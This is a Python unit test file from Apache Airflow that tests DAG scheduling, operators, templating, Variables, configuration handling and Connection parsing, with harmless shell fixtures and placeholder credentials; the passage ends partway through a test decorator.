# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import multiprocessing
import os
import pickle # type: ignore
import signal
import unittest
from datetime import timedelta
from time import sleep
from unittest import mock
import sqlalchemy
from dateutil.relativedelta import relativedelta
from numpy.testing import assert_array_almost_equal
from pendulum import utcnow
from airflow import DAG, exceptions, settings, utils
from airflow.configuration import (
DEFAULT_CONFIG, AirflowConfigException, conf, parameterized_config, run_command,
)
from airflow.exceptions import AirflowException
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.jobs.local_task_job import LocalTaskJob
from airflow.jobs.scheduler_job import DagFileProcessor
from airflow.models import Connection, DagBag, DagRun, TaskFail, TaskInstance, Variable
from airflow.models.baseoperator import BaseOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import PythonOperator
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.dates import days_ago, infer_time_unit, round_time, scale_time_units
from airflow.utils.state import State
from airflow.utils.timezone import datetime
from tests.test_utils.config import conf_vars
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
EXAMPLE_DAG_DEFAULT_DATE = days_ago(2)
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super().__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(self, context):
pass
class TestCore(unittest.TestCase):
TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_no_previous_runs'
TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID = \
TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous'
TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID = \
TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only'
TEST_SCHEDULE_ONCE_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_once'
TEST_SCHEDULE_RELATIVEDELTA_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_relativedelta'
TEST_SCHEDULE_START_END_DATES_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_start_end_dates'
default_scheduler_args = {"num_runs": 1}
def setUp(self):
self.dagbag = DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def tearDown(self):
if os.environ.get('KUBERNETES_VERSION') is not None:
return
dag_ids_to_clean = [
TEST_DAG_ID,
self.TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID,
self.TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID,
self.TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID,
self.TEST_SCHEDULE_ONCE_DAG_ID,
self.TEST_SCHEDULE_RELATIVEDELTA_DAG_ID,
self.TEST_SCHEDULE_START_END_DATES_DAG_ID,
]
session = Session()
session.query(DagRun).filter(
DagRun.dag_id.in_(dag_ids_to_clean)).delete(
synchronize_session=False)
session.query(TaskInstance).filter(
TaskInstance.dag_id.in_(dag_ids_to_clean)).delete(
synchronize_session=False)
session.query(TaskFail).filter(
TaskFail.dag_id.in_(dag_ids_to_clean)).delete(
synchronize_session=False)
session.commit()
session.close()
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(self.TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_file_processor = DagFileProcessor(dag_ids=[], log=mock.MagicMock())
dag_run = dag_file_processor.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_relativedelta(self):
"""
Tests scheduling a dag with a relativedelta schedule_interval
"""
delta = relativedelta(hours=+1)
dag = DAG(self.TEST_SCHEDULE_RELATIVEDELTA_DAG_ID,
schedule_interval=delta)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_file_processor = DagFileProcessor(dag_ids=[], log=mock.MagicMock())
dag_run = dag_file_processor.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag_run2 = dag_file_processor.create_dag_run(dag)
self.assertIsNotNone(dag_run2)
self.assertEqual(dag.dag_id, dag_run2.dag_id)
self.assertIsNotNone(dag_run2.run_id)
self.assertNotEqual('', dag_run2.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0) + delta,
dag_run2.execution_date,
msg='dag_run2.execution_date did not match expectation: {0}'
.format(dag_run2.execution_date)
)
self.assertEqual(State.RUNNING, dag_run2.state)
self.assertFalse(dag_run2.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(self.TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID,
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
dag_file_processor = DagFileProcessor(dag_ids=[], log=mock.MagicMock())
dag.create_dagrun(run_id=DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = dag_file_processor.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(self.TEST_SCHEDULE_ONCE_DAG_ID)
dag.schedule_interval = '@once'
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = DagFileProcessor(dag_ids=[], log=mock.MagicMock()).create_dag_run(dag)
dag_run2 = DagFileProcessor(dag_ids=[], log=mock.MagicMock()).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(self.TEST_SCHEDULE_START_END_DATES_DAG_ID,
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(BaseOperator(task_id='faketastic', owner='Also fake'))
dag_file_processor = DagFileProcessor(dag_ids=[], log=mock.MagicMock())
# Create and schedule the dag runs
dag_runs = []
for _ in range(runs):
dag_runs.append(dag_file_processor.create_dag_run(dag))
additional_dag_run = dag_file_processor.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
now = utcnow()
start_date = now.subtract(weeks=1)
runs = (now - start_date).days
dag = DAG(self.TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID,
start_date=start_date,
schedule_interval=delta)
dag.add_task(BaseOperator(task_id='faketastic', owner='Also fake'))
dag_file_processor = DagFileProcessor(dag_ids=[], log=mock.MagicMock())
dag_runs = []
for _ in range(runs):
dag_run = dag_file_processor.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = dag_file_processor.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
msg = 'Invalid arguments were passed to BashOperator '
'(task_id: test_illegal_args).'
with conf_vars({('operators', 'allow_illegal_arguments'): 'True'}):
with self.assertWarns(PendingDeprecationWarning) as warning:
BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
assert any(msg in str(w) for w in warning.warnings)
def test_illegal_args_forbidden(self):
"""
Tests that operators raise exceptions on illegal arguments when
illegal arguments are not allowed.
"""
with self.assertRaises(AirflowException) as ctx:
BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertIn(
('Invalid arguments were passed to BashOperator '
'(task_id: test_illegal_args).'),
str(ctx.exception))
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command="echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_on_failure_callback(self):
# Annoying workaround for nonlocal not existing in python 2
data = {'called': False}
def check_failure(context, test_case=self):
data['called'] = True
error = context.get('exception')
test_case.assertIsInstance(error, AirflowException)
t = BashOperator(
task_id='check_on_failure_callback',
bash_command="exit 1",
dag=self.dag,
on_failure_callback=check_failure)
self.assertRaises(
exceptions.AirflowException,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
self.assertTrue(data['called'])
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject:
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_task_get_template(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
context = ti.get_template_context()
# DEFAULT DATE is 2015-01-01
self.assertEqual(context['ds'], '2015-01-01')
self.assertEqual(context['ds_nodash'], '20150101')
# next_ds is 2015-01-02 as the dag interval is daily
self.assertEqual(context['next_ds'], '2015-01-02')
self.assertEqual(context['next_ds_nodash'], '20150102')
# prev_ds is 2014-12-31 as the dag interval is daily
self.assertEqual(context['prev_ds'], '2014-12-31')
self.assertEqual(context['prev_ds_nodash'], '20141231')
self.assertEqual(context['ts'], '2015-01-01T00:00:00+00:00')
self.assertEqual(context['ts_nodash'], '20150101T000000')
self.assertEqual(context['ts_nodash_with_tz'], '20150101T000000+0000')
self.assertEqual(context['yesterday_ds'], '2014-12-31')
self.assertEqual(context['yesterday_ds_nodash'], '20141231')
self.assertEqual(context['tomorrow_ds'], '2015-01-02')
self.assertEqual(context['tomorrow_ds_nodash'], '20150102')
def test_local_task_job(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_raise_key_error(self):
with self.assertRaises(KeyError):
Variable.get("thisIdDoesNotExist")
def test_get_non_existing_var_with_none_default_should_return_none(self):
self.assertIsNone(Variable.get("thisIdDoesNotExist", default_var=None))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Happiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Happiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check the returned value, and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_delete(self):
key = "tested_var_delete"
value = "to be deleted"
# No-op if the variable doesn't exist
Variable.delete(key)
with self.assertRaises(KeyError):
Variable.get(key)
# Set the variable
Variable.set(key, value)
self.assertEqual(value, Variable.get(key))
# Delete the variable
Variable.delete(key)
with self.assertRaises(KeyError):
Variable.get(key)
def test_parameterized_config_gen(self):
cfg = parameterized_config(DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(conf.has_option("core", "FERNET_KEY"))
self.assertFalse(conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = conf.get('core', 'FERNET_KEY')
with conf_vars({('core', 'FERNET_KEY_CMD'): 'printf HELLO'}):
FALLBACK_FERNET_KEY = conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(conf.has_option("core", "FERNET_KEY"))
self.assertFalse(conf.has_option("core", "FERNET_KEY_CMD"))
with conf_vars({('core', 'fernet_key'): None}):
with self.assertRaises(AirflowConfigException) as cm:
conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
with mock.patch.dict('os.environ', {key: value}):
FERNET_KEY = conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
with mock.patch.dict('os.environ', {key: value}):
FERNET_KEY = conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existent",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
from airflow.executors.sequential_executor import SequentialExecutor
TI = TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
p_fails = session.query(TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_run_command(self):
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)), '\u1000foo')
self.assertEqual(run_command('echo "foo bar"'), 'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
def test_externally_triggered_dagrun(self):
TI = TaskInstance
# Create the dagrun between two "scheduled" execution dates of the DAG
EXECUTION_DATE = DEFAULT_DATE + timedelta(days=2)
EXECUTION_DS = EXECUTION_DATE.strftime('%Y-%m-%d')
EXECUTION_DS_NODASH = EXECUTION_DS.replace('-', '')
dag = DAG(
TEST_DAG_ID,
default_args=self.args,
schedule_interval=timedelta(weeks=1),
start_date=DEFAULT_DATE)
task = DummyOperator(task_id='test_externally_triggered_dag_context',
dag=dag)
dag.create_dagrun(run_id=DagRun.id_for_date(EXECUTION_DATE),
execution_date=EXECUTION_DATE,
state=State.RUNNING,
external_trigger=True)
task.run(
start_date=EXECUTION_DATE, end_date=EXECUTION_DATE)
ti = TI(task=task, execution_date=EXECUTION_DATE)
context = ti.get_template_context()
# next_ds/prev_ds should be the execution date for manually triggered runs
self.assertEqual(context['next_ds'], EXECUTION_DS)
self.assertEqual(context['next_ds_nodash'], EXECUTION_DS_NODASH)
self.assertEqual(context['prev_ds'], EXECUTION_DS)
self.assertEqual(context['prev_ds_nodash'], EXECUTION_DS_NODASH)
class TestConnection(unittest.TestCase):
def setUp(self):
utils.db.initdb()
@mock.patch.dict('os.environ', {
'AIRFLOW_CONN_TEST_URI': 'postgres://username:[email protected]:5432/the_database',
})
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
@mock.patch.dict('os.environ', {
'AIRFLOW_CONN_TEST_URI_NO_CREDS': 'postgres://ec2.compute.com/the_database',
})
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
with mock.patch.dict('os.environ', {
'AIRFLOW_CONN_AIRFLOW_DB': 'postgres://username:[email protected]:5432/the_database',
}):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
@mock.patch.dict('os.environ', {
'AIRFLOW_CONN_TEST_URI': 'postgres://username:[email protected]:5432/the_database',
'AIRFLOW_CONN_TEST_URI_NO_CREDS': 'postgres://ec2.compute.com/the_database',
})
